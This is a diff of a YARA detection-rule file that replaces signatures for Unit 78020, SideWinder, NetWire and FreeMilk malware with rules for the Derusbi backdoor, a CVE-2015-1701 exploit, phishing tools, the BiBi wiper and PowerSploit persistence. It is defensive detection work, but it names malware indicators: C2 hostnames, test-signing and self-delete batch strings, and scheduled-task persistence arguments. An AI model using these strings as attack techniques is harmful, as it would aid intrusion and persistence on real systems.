-		$x6 = "greensky27.vicp.net.as" fullword wide
-		$x7 = "greensky27.vcip.net" fullword wide
-		$x8 = "pnoc-ec.vicp.net" fullword wide
-		$x9 = "aseanph.vicp.net" fullword wide
-		$x10 = "pnoc.vicp.net" fullword wide
-		$sa1 = "dMozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0; .NET CLR 1.1.4322)" wide fullword
-		$sa2 = "x-www-form-urlencoded/r/n" wide fullword
-		$sa3 = "/%d%s%d" ascii fullword
-		$sa4 = "dMozilla" wide fullword
-		$sa5 = "Accept-Language:En-us" wide fullword
-		$sb1 = "%USERPROFILE%\\Application Data\\Mozilla\\Firefox\\Profiles" wide fullword
-		$sb2 = "\\Office Start.lnk" wide fullword
-		$sb3 = "%02d-%02d-%02d %02d:%02d" wide fullword
-		$sc1 = "\\MSN Talk Start.lnk" wide fullword
-		$sc2 = "-GetModuleFileNameExW" ascii fullword
-		$sc3 = "dwError1 = %d" ascii fullword
+		$s1 = "LxMain"
+		$s2 = "execve"
+		$s3 = "kill"
+		$s4 = "cp -a %s %s"
+		$s5 = "%s &"
+		$s6 = "dbus-daemon"
+		$s7 = "--noprofile"
+		$s8 = "--norc"
+		$s9 = "TERM=vt100"
+		$s10 = "/proc/%u/cmdline"
+		$s11 = "loadso"
+		$s12 = "/proc/self/exe"
+		$s13 = "Proxy-Connection: Keep-Alive"
+		$s14 = "Connection: Keep-Alive"
+		$s15 = "CONNECT %s"
+		$s16 = "HOST: %s:%d"
+		$s17 = "User-Agent: Mozilla/4.0"
+		$s18 = "Proxy-Authorization: Basic %s"
+		$s19 = "Server: Apache"
+		$s20 = "Proxy-Authenticate"
+		$s21 = "gettimeofday"
+		$s22 = "pthread_create"
+		$s23 = "pthread_join"
+		$s24 = "pthread_mutex_init"
+		$s25 = "pthread_mutex_destroy"
+		$s26 = "pthread_mutex_lock"
+		$s27 = "getsockopt"
+		$s28 = "socket"
+		$s29 = "setsockopt"
+		$s30 = "select"
+		$s31 = "bind"
+		$s32 = "shutdown"
+		$s33 = "listen"
+		$s34 = "opendir"
+		$s35 = "readdir"
+		$s36 = "closedir"
+		$s37 = "rename"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or all of ( $sa* ) or all of ( $sb* ) or all of ( $sc* ) )
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SIGNATURE_BASE_Unit78020_Malware_1 : FILE
+rule SIGNATURE_BASE_Apt_Nix_Elf_Derusbi_Kernelmodule_1 : FILE
 {
 	meta:
-		description = "Detects malware by Chinese APT PLA Unit 78020 - Specific Rule - msictl.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0374de68-98cb-5cb8-a936-fe7845de9330"
-		date = "2015-09-24"
-		modified = "2023-12-05"
-		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unit78020_malware.yar#L60-L78"
+		description = "Detects Derusbi Backdoor ELF Kernel Module"
+		author = "Fidelis Cybersecurity"
+		id = "98196ffc-8a6f-5edc-a688-eeb449410b72"
+		date = "2016-02-29"
+		modified = "2023-05-04"
+		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turbo_campaign.yar#L51-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a93d01f1cc2d18ced2f3b2b78319aadc112f611ab8911ae9e55e13557c1c791a"
-		logic_hash = "589dfb39630fd396b1f8c5d9d0ecccfc058edfd8e74e3bd06d1bfb9f91ad1798"
+		logic_hash = "fab37e2dbe05c694da6e428aa922747b276c2827cbbd2b6c8002f0cc30c2870c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%ProgramFiles%\\Internet Explorer\\iexplore.exe" fullword ascii
-		$s2 = "msictl.exe" fullword ascii
-		$s3 = "127.0.0.1:8080" fullword ascii
-		$s4 = "mshtml.dat" fullword ascii
-		$s5 = "msisvc" fullword ascii
-		$s6 = "NOKIAN95/WEB" fullword ascii
+		$s1 = "__this_module"
+		$s2 = "init_module"
+		$s3 = "unhide_pid"
+		$s4 = "is_hidden_pid"
+		$s5 = "clear_hidden_pid"
+		$s6 = "hide_pid"
+		$s7 = "license"
+		$s8 = "description"
+		$s9 = "srcversion="
+		$s10 = "depends="
+		$s12 = "vermagic="
+		$s13 = "current_task"
+		$s14 = "sock_release"
+		$s15 = "module_layout"
+		$s16 = "init_uts_ns"
+		$s17 = "init_net"
+		$s18 = "init_task"
+		$s19 = "filp_open"
+		$s20 = "__netlink_kernel_create"
+		$s21 = "kfree_skb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 160KB and 4 of them
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SIGNATURE_BASE_Unit78020_Malware_Gen2 : FILE
+rule SIGNATURE_BASE_Apt_Nix_Elf_Derusbi_Linux_Sharedmemcreation_1 : FILE
 {
 	meta:
-		description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9492b1f8-c2a9-5e3b-ad62-fbc3d99392b3"
-		date = "2015-09-24"
+		description = "Detects Derusbi Backdoor ELF Shared Memory Creation"
+		author = "Fidelis Cybersecurity"
+		id = "068b7bea-853d-57e8-a9fe-8b451dbc7582"
+		date = "2016-02-29"
 		modified = "2023-12-05"
-		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unit78020_malware.yar#L80-L101"
+		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turbo_campaign.yar#L85-L96"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fd3cb904499a985830543174126761a3cdcff134d61b93b1105a489c00bd042f"
+		logic_hash = "adbdccea9ea7aefcca18d659c027a49e7e2e053873b77ddaf369203b3e301033"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd"
-		hash2 = "7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af"
-		hash3 = "981e2fa1ae4145359036b46e8b53cc5da37dd2311204859761bd91572f025e8a"
 
 	strings:
-		$s0 = "-GetModuleFileNameExW" fullword ascii
-		$s1 = "\\MSN Talk Start.lnk" wide
-		$s2 = ":SeDebugPrivilege" fullword wide
-		$s3 = "WinMM Version 1.0" fullword wide
-		$s4 = "dwError1 = %d" fullword ascii
-		$s5 = "*Can't Get" fullword wide
+		$byte1 = { B6 03 00 00 ?? 40 00 00 00 ?? 0D 5F 01 82 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		uint32( 0 ) == 0x464C457F and any of them
 }
-rule SIGNATURE_BASE_Unit78020_Malware_Gen3 : FILE
+rule SIGNATURE_BASE_Apt_Nix_Elf_Derusbi_Linux_Strings_1 : FILE
 {
 	meta:
-		description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule - Chong"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e26f386e-e98c-5005-9343-1873d2e35a1f"
-		date = "2015-09-24"
+		description = "Detects Derusbi Backdoor ELF Strings"
+		author = "Fidelis Cybersecurity"
+		id = "06717cc9-678d-5912-a671-65605b9c9968"
+		date = "2016-02-29"
 		modified = "2023-12-05"
-		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unit78020_malware.yar#L103-L132"
+		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turbo_campaign.yar#L98-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "304b3f429e144f1f4b0f7794e77f3059ec6b3e5c6fdf4c7b820a77db1cf8cfcb"
+		logic_hash = "b54b406a562247d4c3d4a9c4d1b7584bdcecfe5b6c76867c04770e016eeb8c9a"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac"
-		hash2 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2"
 
 	strings:
-		$x1 = "GET http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii
-		$x2 = "POST http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii
-		$x3 = "J:\\chong\\" ascii
-		$s1 = "User-Agent: Netscape" fullword ascii
-		$s2 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7" fullword ascii
-		$s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\User Shell Folders" fullword wide
-		$s4 = "J:\\chong\\nod\\Release\\SslMM.exe" fullword ascii
-		$s5 = "MM.exe" fullword ascii
-		$s6 = "network.proxy.ssl" fullword wide
-		$s7 = "PeekNamePipe" fullword ascii
-		$s8 = "Host: %ws:%d" fullword ascii
-		$s9 = "GET %dHTTP/1.1" fullword ascii
-		$s10 = "SCHANNEL.DLL" fullword ascii
+		$a1 = "loadso" wide ascii fullword
+		$a2 = "\nuname -a\n\n" wide ascii
+		$a3 = "/dev/shm/.x11.id" wide ascii
+		$a4 = "LxMain64" wide ascii nocase
+		$a5 = "# \\u@\\h:\\w \\$ " wide ascii
+		$b1 = "0123456789abcdefghijklmnopqrstuvwxyz" wide
+		$b2 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" wide
+		$b3 = "ret %d" wide fullword
+		$b4 = "uname -a\n\n" wide ascii
+		$b5 = "/proc/%u/cmdline" wide ascii
+		$b6 = "/proc/self/exe" wide ascii
+		$b7 = "cp -a %s %s" wide ascii
+		$c1 = "/dev/pts/4" wide ascii fullword
+		$c2 = "/tmp/1408.log" wide ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) ) or 4 of ( $s* )
+		uint32( 0 ) == 0x464C457F and ( ( 1 of ( $a* ) and 4 of ( $b* ) ) or ( 1 of ( $a* ) and 1 of ( $c* ) ) or 2 of ( $a* ) or all of ( $b* ) )
 }
-rule SIGNATURE_BASE_APT_Sidewinder_NET_Loader_Aug_2020_1_1 : FILE
+rule SIGNATURE_BASE_Apt_Win_Exe_Trojan_Derusbi_1 : FILE
 {
 	meta:
-		description = "Detected the NET loader used by SideWinder group (August 2020)"
-		author = "Arkbird_SOLG"
-		id = "61d96e2a-3a43-586f-85bc-a2c53b1318e6"
-		date = "2020-08-24"
+		description = "Detects Derusbi Backdoor Win32"
+		author = "Fidelis Cybersecurity"
+		id = "6e7fecfa-f801-59b2-a394-df4c368011b7"
+		date = "2016-02-29"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/ShadowChasing1/status/1297902086747598852"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sidewinder.yar#L4-L22"
+		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turbo_campaign.yar#L130-L189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5ee7029143c589f26e6c325e163bfac85507c950f09778bd51ec2bdf4d4263fa"
+		logic_hash = "02fb4da724b257aef0ec0fecfe5b7a25a23fe4dd5baae0ddd2d21350b9af34e9"
 		score = 75
 		quality = 83
 		tags = "FILE"
-		hash1 = "4a0947dd9148b3d5922651a6221afc510afcb0dfa69d08ee69429c4c75d4c8b4"
 
 	strings:
-		$a1 = "DUSER.dll" fullword wide
-		$s1 = "UHJvZ3JhbQ==" fullword wide
-		$s2 = "U3RhcnQ=" fullword wide
-		$s3 = ".tmp           " fullword wide
-		$s4 = "FileRipper" fullword ascii
-		$s5 = "copytight @" fullword wide
+		$sa_4 = "HOST: %s:%d"
+		$sa_6 = "User-Agent: Mozilla"
+		$sa_7 = "Proxy-Connection: Keep-Alive"
+		$sa_8 = "Connection: Keep-Alive"
+		$sa_9 = "Server: Apache"
+		$sa_12 = "ZwUnloadDriver"
+		$sa_13 = "ZwLoadDriver"
+		$sa_18 = "_time64"
+		$sa_19 = "DllRegisterServer"
+		$sa_20 = "DllUnregisterServer"
+		$sa_21 = { 8b [5] 8b ?? d3 ?? 83 ?? 08 30 [5] 40 3b [5] 72 }
+		$sb_1 = "PCC_CMD_PACKET"
+		$sb_2 = "PCC_CMD"
+		$sb_3 = "PCC_BASEMOD"
+		$sb_4 = "PCC_PROXY"
+		$sb_5 = "PCC_SYS"
+		$sb_6 = "PCC_PROCESS"
+		$sb_7 = "PCC_FILE"
+		$sb_8 = "PCC_SOCK"
+		$sc_1 = "bcdedit -set testsigning" wide ascii
+		$sc_2 = "update.microsoft.com" wide ascii
+		$sc_3 = "_crt_debugger_hook" wide ascii
+		$sc_4 = "ue8G5" wide ascii
+		$sd_2 = "\\\\.\\pipe\\%s" wide ascii
+		$sd_3 = ".dat" wide ascii
+		$sd_4 = "CONNECT %s:%d" wide ascii
+		$sd_5 = "\\Device\\" wide ascii
+		$se_1 = "-%s-%04d" wide ascii
+		$se_2 = "-%04d" wide ascii
+		$se_5 = "2.03" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4KB and $a1 and 3 of ( $s* )
+		uint16( 0 ) == 0x5A4D and ( all of ( $sa_* ) or ( ( 8 of ( $sa_* ) ) and ( ( 5 of ( $sb_* ) ) or ( 3 of ( $sc_* ) ) or ( all of ( $sd_* ) ) or ( 1 of ( $sc_* ) and all of ( $se_* ) ) ) ) )
 }
-rule SIGNATURE_BASE_APT_MAL_Sidewinder_Implant : FILE
+rule SIGNATURE_BASE_CVE_2015_1701_Taihou : CVE_2015_1701 FILE
 {
 	meta:
-		description = "Detects SideWinder final payload"
-		author = "AT&T Alien Labs"
-		id = "3a420c9c-7821-5405-8d4d-6931d0f311ba"
-		date = "2020-08-25"
+		description = "CVE-2015-1701 compiled exploit code"
+		author = "Florian Roth (Nextron Systems)"
+		id = "58250e17-aa46-5451-ae6d-18fb4030f8df"
+		date = "2015-05-13"
 		modified = "2023-12-05"
-		reference = "https://cybersecurity.att.com/blogs/labs-research/a-global-perspective-of-the-sidewinder-apt"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sidewinder.yar#L24-L50"
+		reference = "http://goo.gl/W4nU0q"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2015_1701.yar#L2-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bfad86dbdc04463e7e4cc126fd05fc9107617a7ea1bd3f283c0e0170862bd59b"
-		score = 75
+		logic_hash = "d230e036c303642c40bdf83be2b097f6e447a7e7d4292c495179edbae8a4124c"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "c568238dcf1e30d55a398579a4704ddb8196b685"
+		tags = "CVE-2015-1701, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "90d17ebd75ce7ff4f15b2df951572653efe2ea17"
+		hash2 = "acf181d6c2c43356e92d4ee7592700fa01e30ffb"
+		hash3 = "b8aabe12502f7d55ae332905acee80a10e3bc399"
+		hash4 = "d9989a46d590ebc792f14aa6fec30560dfe931b1"
+		hash5 = "63d1d33e7418daf200dc4660fc9a59492ddd50d9"
 
 	strings:
-		$code = { 1B 30 05 00 C7 00 00 00 00 00 00 00 02 28 03 00
-               00 06 7D 12 00 00 04 02 02 FE 06 23 00 00 06 73
-               5B 00 00 0A 14 20 88 13 00 00 15 73 5C 00 00 0A
-               7D 13 00 00 04 02 02 FE 06 24 00 00 06 73 5B 00
-               00 0A 14 20 88 13 00 00 15 73 5C 00 00 0A 7D 15
-               00 00 04 02 7B 12 00 00 04 6F 0E 00 00 06 2C 1D
-               02 28 1F 00 00 06 02 7B 12 00 00 04 16 6F 0F 00
-               00 06 02 7B 12 00 00 04 6F 06 00 00 06 02 7B 12
-               00 00 04 6F 10 00 00 06 2C 23 02 28 20 00 00 06
-               02 28 21 00 00 06 02 7B 12 00 00 04 16 }
-		$strings = {
-         2E 00 73 00 69 00 66 00 00 09 2E 00 66 00 6C 00
-         63 00 00 1B 73 00 65 00 6C 00 65 00 63 00 74 00
-         65 00 64 00 46 00 69 00 6C 00 65 00 73
-      }
+		$s3 = "VirtualProtect" fullword
+		$s4 = "RegisterClass"
+		$s5 = "LoadIcon"
+		$s6 = "PsLookupProcessByProcessId" fullword ascii
+		$s7 = "LoadLibraryExA" fullword ascii
+		$s8 = "gSharedInfo" fullword
+		$w1 = "user32.dll" wide
+		$w2 = "ntdll" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 160KB and all of ( $s* ) and 1 of ( $w* )
 }
-rule SIGNATURE_BASE_Susp_Indicators_EXE : FILE
+rule SIGNATURE_BASE_APT_Area1_SSF_Plugx
 {
 	meta:
-		description = "Detects packed NullSoft Inst EXE with characteristics of NetWire RAT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b4015c24-d18e-51eb-9854-8cc0e6dba4d0"
-		date = "2018-01-05"
+		description = "Detects send tool used in phishing campaign reported by Area 1 in December 2018"
+		author = "Area 1"
+		id = "a5b4e781-f0d1-55df-926c-2d321aa48139"
+		date = "2018-12-19"
 		modified = "2023-12-05"
-		reference = "https://pastebin.com/8qaiyPxs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_netwire_rat.yar#L11-L30"
+		reference = "https://cdn.area1security.com/reports/Area-1-Security-PhishingDiplomacy.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_area1_phishing_diplomacy.yar#L2-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9cb66435b78893daa5583475b14f0df2a5e8612f3aaf5cb02160991ab4d57d1b"
-		score = 60
+		logic_hash = "a71f124f0c89c4b020f21d029d0d2997b2bea71526e83bcadffb67acc9cca8f7"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6de7f0276afa633044c375c5c630740af51e29b6a6f17a64fbdd227c641727a4"
+		tags = ""
 
 	strings:
-		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion"
-		$s2 = "Error! Bad token or internal error" fullword ascii
-		$s3 = "CRYPTBASE" fullword ascii
-		$s4 = "UXTHEME" fullword ascii
-		$s5 = "PROPSYS" fullword ascii
-		$s6 = "APPHELP" fullword ascii
+		$feature_call = { 8b 0? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+         6a 07 6a ff ff d0 8b f0 85 f6 74 14 }
+		$keylogger_reg = { 8b 4d 08 6a 0c 6a 01 8d 55 f4 52 c7 45 f4 01 00 06 00
+         c7 45 f8 00 01 00 00 89 4d fc ff d0 85 c0 75 1d }
+		$file_op = { 55 8b ec 83 ec 20 0f b7 56 18 8b 46 10 66 8b 4e 14 89 45 e4
+         8d 44 32 10 66 89 4d f0 0f b7 4e 1a 57 89 45 e8 33 ff 8d 45 e0 8d 54
+         31 10 50 89 7d e0 89 55 ec c7 45 fa ?? ?? ?? ?? 89 7d f2 89 7d f6 ff
+         15 1c 43 02 10 }
+		$ver_cmp = { 0f b6 8d b0 fe ff ff 0f b6 95 b4 fe ff ff 66 c1 e1 08 0f b7
+         c1 0b c2 3d 02 05 00 00 7f 2c }
+		$regedit = { c7 06 23 01 12 20 c7 46 04 01 90 00 00 89 5e 0c 89 5e 08 e8
+         51 fb ff ff 8b 4d 08 8b 50 38 68 30 75 00 00 56 51 ff d2 }
+		$get_device_caps = { 8b 1d ?? ?? ?? ?? 6a 08 50 ff d3 0f b7 56 12 8b c8 0f af ca
+         b8 1f 85 eb 51 f7 e9 c1 fa 05 8b c2 c1 e8 1f 03 c2 89 45 f8 8b 45 f0 6a 0a 50 ff d3
+         0f b7 56 14 8b c8 0f af ca b8 1f 85 eb 51 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3c ) ) == 0x4550 and filesize < 700KB and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_Suspicious_BAT_Strings : FILE
+rule SIGNATURE_BASE_APT_Area1_SSF_Googlesend_Strings : FILE
 {
 	meta:
-		description = "Detects a string also used in Netwire RAT auxilliary"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5fe28555-96c8-54da-b047-7d0a7532a6d2"
-		date = "2018-01-05"
+		description = "Detects send tool used in phishing campaign reported by Area 1 in December 2018"
+		author = "Area 1 (modified by Florian Roth)"
+		id = "66a2faa1-b133-528c-91a9-06a43d2c00a0"
+		date = "2018-12-19"
 		modified = "2023-12-05"
-		reference = "https://pastebin.com/8qaiyPxs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_netwire_rat.yar#L32-L45"
+		reference = "https://cdn.area1security.com/reports/Area-1-Security-PhishingDiplomacy.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_area1_phishing_diplomacy.yar#L29-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e643a5ef41d084e1b1a20be2c56328b72fedddbbce3c79d1e93cc8cfaa633e12"
-		score = 60
+		logic_hash = "3a373ed63494b67883515c133bf5b0af3ab874397c7cb45c8399f12e35212be4"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "ping 192.0.2.2 -n 1" ascii
+		$conf = "RefreshToken.ini" wide
+		$client_id = "Enter your client ID here" wide
+		$client_secret = "Enter your client secret here" wide
+		$status = "We are going to send" wide
+		$s1 = { b8 00 01 00 00 f0 0f b0 23 74 94 f3 90 80 3d ?? ?? ?? ?? 00 75 ??
+         51 52 6a 00 e8 ?? ?? ?? ?? 5a 59 b8 00 01 00 00 f0 0f b0
+         23 0f ?? ?? ?? ?? ?? 51 52 6a 0a e8 ?? ?? ?? ?? 5a 59 eb c3 }
 
 	condition:
-		filesize < 600KB and 1 of them
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule SIGNATURE_BASE_Malicious_BAT_Strings : FILE
+rule SIGNATURE_BASE_MAL_WIPER_Bibi_Oct23 : FILE
 {
 	meta:
-		description = "Detects a string also used in Netwire RAT auxilliary"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6e197d05-62eb-535d-8cd6-db8550e51588"
-		date = "2018-01-05"
+		description = "Detects BiBi wiper samples for Windows and Linux"
+		author = "Florian Roth"
+		id = "e1ea8016-e074-5208-8c98-54922bbcc407"
+		date = "2023-11-01"
 		modified = "2023-12-05"
-		reference = "https://pastebin.com/8qaiyPxs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_netwire_rat.yar#L47-L60"
+		reference = "https://x.com/ESETresearch/status/1719437301900595444?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_bibi_wiper_oct23.yar#L24-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1f39b3fd11e7450eb1eaddeeca60aa4970568efda6053029f85df42e2f9fdd6e"
-		score = 60
+		logic_hash = "c22dc994005f91f81d0e8e5f8d400b12ecd28336866bc62b8527e104f6339372"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "23bae09b5699c2d5c4cb1b8aa908a3af898b00f88f06e021edcb16d7d558efad"
+		hash2 = "40417e937cd244b2f928150cae6fa0eff5551fdb401ea072f6ecdda67a747e17"
 
 	strings:
-		$s1 = "call :deleteSelf&exit /b"
+		$s1 = "send attempt while closed" ascii fullword
+		$s2 = "[+] CPU cores: %d, Threads: %d" ascii fullword
+		$s3 = "[+] Stats: %d | %d" ascii fullword
+		$opw1 = { 33 c0 88 45 48 b8 01 00 00 00 86 45 48 45 8b f5 48 8d 3d de f5 ff ff 0f 57 c9 f3 0f 7f 4d b8 }
+		$opw2 = { 2d ce b5 00 00 c5 fa e6 f5 e9 40 fe ff ff 0f 1f 44 00 00 75 2e c5 fb 10 0d 26 b4 00 00 44 8b 05 5f b6 00 00 e8 ca 0d 00 00 }
+		$opl1 = { 4c 8d 44 24 08 48 89 f7 48 ff c2 48 83 c6 04 e8 c7 fb ff ff 41 89 c1 0f b6 42 ff 41 0f af c1 }
+		$opl2 = { e8 6f fb ff ff 49 8d 78 f8 89 c0 48 01 c2 48 89 15 09 fb 24 00 e8 5a fb ff ff 49 8d 78 fc 6b f0 06 }
 
 	condition:
-		filesize < 600KB and 1 of them
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and filesize < 4000KB and 2 of them
 }
-
-rule SIGNATURE_BASE_Freemilk_APT_Mal_1 : FILE
+rule SIGNATURE_BASE_HKTL_Powersploit
 {
 	meta:
-		description = "Detects malware from FreeMilk campaign"
-		author = "Florian Roth (Nextron Systems)"
-		id = "eff37dba-d4a9-5e3d-9452-49f04ddcbe0b"
-		date = "2017-10-05"
+		description = "Detects default strings used by PowerSploit to establish persistence"
+		author = "Markus Neis"
+		id = "8cb0753c-c5bb-56fc-b492-4e785f4bdaf4"
+		date = "2018-06-23"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_freemilk.yar#L13-L39"
+		reference = "https://www.hybrid-analysis.com/sample/16937e76db6d88ed0420ee87317424af2d4e19117fe12d1364fee35aa2fadb75?environmentId=100"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powersploit_dropper.yar#L1-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d66feceb01ecdd84345def58270a8788b563c99a7efadf9a3049c5fbbbd15da8"
+		logic_hash = "00bc389147926f3b474a7072381bb8b9cddad3ff581a5d2182006a674e0c0163"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "34478d6692f8c28332751b31fd695b799d4ab36a8c12f7b728e2cb99ae2efcd9"
-		hash2 = "35273d6c25665a19ac14d469e1436223202be655ee19b5b247cb1afef626c9f2"
-		hash3 = "0f82ea2f92c7e906ee9ffbbd8212be6a8545b9bb0200eda09cce0ba9d7cb1313"
+		quality = 81
+		tags = ""
+		hash1 = "16937e76db6d88ed0420ee87317424af2d4e19117fe12d1364fee35aa2fadb75"
 
 	strings:
-		$x1 = "\\milk\\Release\\milk.pdb" ascii
-		$x2 = "E:\\BIG_POOH\\Project\\" ascii
-		$x3 = "Windows-KB271854-x86.exe" fullword wide
-		$s1 = "Windows-KB275122-x86.exe" fullword wide
-		$s2 = "\\wsatra.tmp" wide
-		$s3 = "%s\\Rar0tmpExtra%d.rtf" fullword wide
-		$s4 = "\"%s\" help" fullword wide
+		$ps = "function" nocase ascii wide
+		$s1 = "/Create /RU system /SC ONLOGON" ascii wide
+		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "108aa007b3d1b4817ff4c04d9b254b39" or 1 of ( $x* ) or 4 of them )
+		all of them
 }
 
-rule SIGNATURE_BASE_Freemilk_APT_Mal_2 : FILE
+rule SIGNATURE_BASE_APT_Donotteam_Ytyframework : APT DONOTTEAM WINDOWS FILE
 {
 	meta:
